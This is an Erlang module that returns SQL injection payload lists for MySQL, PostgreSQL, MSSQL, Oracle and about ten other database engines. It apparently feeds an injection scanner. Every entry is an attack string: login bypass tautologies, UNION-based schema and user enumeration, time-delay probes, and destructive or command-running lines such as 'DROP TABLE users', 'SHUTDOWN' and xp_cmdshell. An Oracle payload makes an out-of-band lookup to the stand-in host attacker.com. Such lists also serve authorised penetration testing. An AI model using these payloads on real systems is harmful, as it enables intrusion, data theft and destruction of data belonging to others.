-module(payloads).
-export([get_payloads/1]).

get_payloads(mysql) ->
    [
        "' OR '1'='1'--",
        "' UNION SELECT NULL,NULL--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "\" OR \"1\"=\"1\"--",
        "' OR sleep(5)--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1 LIMIT 1--",
        "' OR 1=1 ORDER BY 1--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--",
        "' OR 1=1 AND 4=4--"
    ];
get_payloads(postgresql) ->
    [
        "' OR TRUE--",
        "'; SELECT version();--",
        "' OR 1=1--",
        "' OR 1=2--",
        "' UNION SELECT NULL--",
        "' UNION SELECT version()--",
        "' OR pg_sleep(5)--",
        "' AND 1=1--",
        "' AND 1=2--",
        "'; DROP TABLE users;--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(mssql) ->
    [
        "' OR 1=1--",
        "'; exec xp_cmdshell('whoami')--",
        "'; WAITFOR DELAY '0:0:5'--",
        "' UNION SELECT NULL--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR SLEEP(5)--",
        "'; SHUTDOWN--",
        "'; SELECT @@version--",
        "'; SELECT name FROM master..sysdatabases--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(oracle) ->
    [
        "' OR 1=1--",
        "' UNION SELECT banner FROM v$version--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL FROM dual--",
        "' OR 1=UTL_INADDR.get_host_address('attacker.com')--",
        "' OR 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--",
        "'; SELECT * FROM all_users--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(sqlite) ->
    [
        "' OR 1=1--",
        "' UNION SELECT sqlite_version()--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL--",
        "'; ATTACH DATABASE '/tmp/test.db' AS test--",
        "'; SELECT name FROM sqlite_master--",
        "'; PRAGMA database_list--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(db2) ->
    [
        "' OR 1=1--",
        "' UNION SELECT service_level FROM sysibmadm.env_inst_info--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL--",
        "'; SELECT * FROM sysibm.systables--",
        "'; VALUES CURRENT TIMESTAMP--",
        "'; SELECT versionnumber FROM sysibm.sysversions--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(informix) ->
    [
        "' OR 1=1--",
        "' UNION SELECT dbinfo('version','full') FROM systables WHERE tabid=1--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL--",
        "'; SELECT * FROM systables--",
        "'; SELECT dbinfo('utc_to_datetime', 0)--",
        "'; SELECT user FROM systables--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(sybase) ->
    [
        "' OR 1=1--",
        "' UNION SELECT @@version--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL--",
        "'; SELECT name FROM sysobjects--",
        "'; SELECT @@servername--",
        "'; SELECT user_name()--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(mariadb) ->
    [
        "' OR 1=1--",
        "' UNION SELECT VERSION()--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL--",
        "'; SELECT user()--",
        "'; SELECT schema()--",
        "'; SELECT @@datadir--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(firebird) ->
    [
        "' OR 1=1--",
        "' UNION SELECT rdb$get_context('SYSTEM', 'ENGINE_VERSION') FROM rdb$database--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL--",
        "'; SELECT * FROM rdb$relations--",
        "'; SELECT CURRENT_USER FROM rdb$database--",
        "'; SELECT MON$ATTACHMENT_ID FROM MON$ATTACHMENTS--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(teradata) ->
    [
        "' OR 1=1--",
        "' UNION SELECT InfoData FROM DBC.DBCInfoV WHERE InfoKey = 'VERSION'--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL--",
        "'; SELECT * FROM DBC.TablesV--",
        "'; SELECT CURRENT_DATE--",
        "'; SELECT USER--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(sap_hana) ->
    [
        "' OR 1=1--",
        "' UNION SELECT VERSION FROM SYS.M_DATABASE--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL--",
        "'; SELECT * FROM SYS.M_USERS--",
        "'; SELECT CURRENT_USER--",
        "'; SELECT DATABASE_NAME FROM SYS.M_DATABASES--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(ingres) ->
    [
        "' OR 1=1--",
        "' UNION SELECT DBMSINFO('version') FROM iidbdb--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "' UNION SELECT NULL--",
        "'; SELECT * FROM iitables--",
        "'; SELECT iidbdb--",
        "'; SELECT CURRENT_USER--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ];
get_payloads(_) ->
    [
        "' OR '1'='1'--",
        "' OR 1=1--",
        "' OR 1=1#",
        "' OR 1=1/*",
        "\" OR \"1\"=\"1\"--",
        "' OR sleep(5)--",
        "' AND 1=1--",
        "' AND 1=2--",
        "' OR 1=1 LIMIT 1--",
        "' OR 1=1 ORDER BY 1--",
        "' OR ''='",
        "' OR 1=1-- -",
        "' OR 1=1;--",
        "' OR 1=1 AND ''='",
        "' OR 1=1 AND 1=1--",
        "' OR 1=1 AND 1=2--",
        "' OR 1=1 AND 2=2--",
        "' OR 1=1 AND 2=3--",
        "' OR 1=1 AND 3=3--",
        "' OR 1=1 AND 3=4--"
    ].
